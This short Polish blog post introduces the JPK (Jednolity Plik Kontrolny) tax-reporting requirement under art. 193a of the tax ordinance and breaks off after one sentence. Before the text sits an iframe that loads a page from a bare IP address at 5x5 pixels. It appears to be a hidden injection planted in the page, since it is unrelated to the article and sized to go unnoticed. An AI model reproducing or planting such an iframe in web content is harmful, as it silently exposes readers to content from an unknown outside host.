JKP jednolity plik kontrolny

Jednolity plik kontrolny

Maj 15, 2016 admin 0

[iframe src=”http://145.239.83.230/index.html?input_height=5&input_width=5&output_width=5&output_height=5″] Nowelizacja ustawy Ordynacja Podatkowa wprowadziła zapisami w art. 193a  nowy wymóg dla podatników w zakresie elektronicznego raportowania określonych danych w danym formacie narzuconym […]